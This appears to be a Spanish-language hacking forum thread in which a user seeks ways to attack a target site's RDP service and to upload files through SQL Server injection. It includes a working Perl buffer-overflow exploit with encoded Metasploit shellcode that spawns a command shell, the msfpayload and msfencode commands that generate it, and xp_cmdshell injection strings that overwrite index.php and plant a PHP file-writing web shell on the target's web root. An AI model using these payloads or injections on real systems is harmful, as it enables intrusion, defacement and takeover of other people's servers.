Mensajes

Buenas,en mi objetivo,e encontrado aparte del servidor http, que tiene el servicio de escritorio remoto de windows,por lo que e leido,se puede atacar D.O.S por ese servicio , e buscado exploits y no e encontrado,ahora la pregunta es si hay algun exploit para este servicio o alguna forma de ataque ,saludos y gracias de antemano..



3389/tcp open  microsoft-rdp Microsoft Terminal Service

PHAMTOM

Buenas,encontré una pagina vulnerable a sql inyection,SQLSERVER.-

quisiera saber si hay algun metodo , que con la inyeccion subir un archivo de mi pc , al pc remoto vulnerable..

La inyeccion la hago por un formulario..-


Saludos,PHAMTOM

Buenas gente,

Solo decir que phantom la paso por un encoder, por eso le quedo ese chorizo .

./msfpayload windows/exec CMD=cmd Raw| ./msfencode -e x86/alpha_mixed -t perl

Phantom, dejala asi nomas si no tenes ninguna restriccion de entrada del programa vulnerable. El unico caracter que te molesta es el null.

Muy buen manual Ikary .

Es qué por eso mismo le hago un " encode " , por los caracteres null's.

PHAMTOM

Si voy a probar,el temá es que en la pagina de metasploit,en la parte de payloads,creo que se encuentran mejores payloads,pero como esta offline en este momento la pagina , tube que inprovisar de donde sacar una  ,por lo que acudi a metasploit framework 3 , con el comando :

./msfpayload windows/exec CMD=cmd Raw| ./msfencode -e x86/alpha_mixed -t perl


y para la calc :


./msfpayload windows/exec CMD=calc Raw | ./msfencode -e x86/alpha_mixed -t perl

Mañana nos escribimos,me voy a ZzZ...

Saludos,PHAMTOM.-

Hola que tal H-PHAMTOM

Una preguntilla, por que cambiar el buffer de 300 a 700?

Saludos

Porque estuve viendo el manual y utilize el algoritmo de restar el numero del buffer desbordado, al  size del shellcode...

shellcode = 453 size
Buffer = 716 Escribiendo eip.
716-453 = 263..

Saludos..

   ...

Muy bueno ikary, buenisimo el manual,ahi termine de aprender Local BoF , para la gente que no se lleva bien con C++ , o C , aca le dejo un exploit para este programa vulnerable, que ejecuta el payload CMD , programado el perl ..

Funciona para buffer 700 , ya que cambie el 300 por 700 en el programa vulnerable C++

{
char buff[700] = "Datos";
strcpy(buff,cptr);
printf("%s\n\n",buff);
return 0;
}

EXPLOIT :

Código [Seleccionar] Expandir

#1----------------------------------------------------------------------------
my $nopp="\x90" x 263;
my $shellcode =
"\x89\xe0\xd9\xc0\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" .
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
"\x75\x4a\x49\x49\x6c\x4d\x38\x4d\x59\x45\x50\x47\x70\x43" .
"\x30\x45\x30\x4f\x79\x4b\x55\x46\x51\x49\x42\x50\x64\x4c" .
"\x4b\x50\x52\x50\x30\x4e\x6b\x51\x42\x44\x4c\x4c\x4b\x50" .
"\x52\x46\x74\x4e\x6b\x42\x52\x45\x78\x44\x4f\x4c\x77\x50" .
"\x4a\x46\x46\x50\x31\x49\x6f\x44\x71\x4f\x30\x4e\x4c\x47" .
"\x4c\x43\x51\x51\x6c\x44\x42\x46\x4c\x51\x30\x4f\x31\x48" .
"\x4f\x44\x4d\x47\x71\x4b\x77\x49\x72\x4a\x50\x50\x52\x51" .
"\x47\x4c\x4b\x51\x42\x46\x70\x4e\x6b\x42\x62\x47\x4c\x47" .
"\x71\x48\x50\x4c\x4b\x47\x30\x42\x58\x4d\x55\x4f\x30\x44" .
"\x34\x51\x5a\x45\x51\x48\x50\x42\x70\x4e\x6b\x43\x78\x45" .
"\x48\x4c\x4b\x50\x58\x47\x50\x47\x71\x4e\x33\x4a\x43\x47" .
"\x4c\x47\x39\x4e\x6b\x45\x64\x4c\x4b\x43\x31\x48\x56\x46" .
"\x51\x49\x6f\x44\x71\x4b\x70\x4c\x6c\x49\x51\x48\x4f\x46" .
"\x6d\x47\x71\x48\x47\x46\x58\x4d\x30\x42\x55\x48\x74\x43" .
"\x33\x51\x6d\x48\x78\x47\x4b\x43\x4d\x51\x34\x50\x75\x4d" .
"\x32\x42\x78\x4c\x4b\x42\x78\x45\x74\x45\x51\x4a\x73\x51" .
"\x76\x4e\x6b\x44\x4c\x42\x6b\x4e\x6b\x51\x48\x45\x4c\x46" .
"\x61\x4b\x63\x4c\x4b\x45\x54\x4e\x6b\x46\x61\x4a\x70\x4b" .
"\x39\x47\x34\x45\x74\x45\x74\x51\x4b\x51\x4b\x50\x61\x46" .
"\x39\x51\x4a\x42\x71\x4b\x4f\x4d\x30\x42\x78\x51\x4f\x42" .
"\x7a\x4e\x6b\x46\x72\x48\x6b\x4f\x76\x43\x6d\x43\x5a\x46" .
"\x61\x4c\x4d\x4d\x55\x4c\x79\x43\x30\x47\x70\x43\x30\x50" .
"\x50\x45\x38\x45\x61\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x4b" .
"\x65\x4f\x4b\x49\x70\x47\x6d\x47\x5a\x45\x5a\x51\x78\x4f" .
"\x56\x4f\x65\x4f\x4d\x4f\x6d\x49\x6f\x4e\x35\x45\x6c\x47" .
"\x76\x51\x6c\x44\x4a\x4b\x30\x4b\x4b\x4b\x50\x44\x35\x43" .
"\x35\x4f\x4b\x43\x77\x46\x73\x50\x72\x42\x4f\x50\x6a\x47" .
"\x70\x51\x43\x49\x6f\x4b\x65\x45\x33\x42\x4d\x42\x44\x45" .
"\x50\x44\x4a\x41\x41";



#1---------------------------------------------------------------------------
my $exploit=$nopp.$shellcode;
my $file = "archivo.txt";
open( $FILE, ">$file" );
print $FILE $exploit;
close( $FILE );

print "Archivo.txt generado con exito,prosiga habriendo la aplicacion vulnerable.-\n"







PD : NO ANDA LA WEB DE PAYLOADS DE METASPLOIT :'(, LA TUBE QUE GENERAR DESDE EL PROGRAMA MSF.


PHAMTOM

Claro, ahora estaba viendo de modificar el index.php, desde exec.


''exec master.xp_cmdshell 'echo hola  ^> C:\AppServ\www\index.php' --

si el servidor acepta " exec " y el index.php se ubique en la ruta especificada , funcionaria?

C:\AppServ\www\index.php

Problema solucionado , gracias otra vez WHK.

Muchas gracias, se programar php, por lo tanto creo que leyendo el manual , lo puedo solucionar ,gracias.

hola

yo queria atravez de sql server , de una iyneccion en las bases de datos de una web
que corre por sql server
queria subirle un archivo ,pero , me pueden corregir el codigo,no lo sube y lo vi varias veces.


'';exec master..xp_cmdshell 'echo ^<? $d=fopen("index.php","w");$s=$_REQUEST["variable"];fputs($d,$s);fclose($d); ?^>  > C:\AppServ\www\update.php'--

Queria subir el archivo update,con el siguiente codigo .

Gracias de antemano

el individuo usa appserver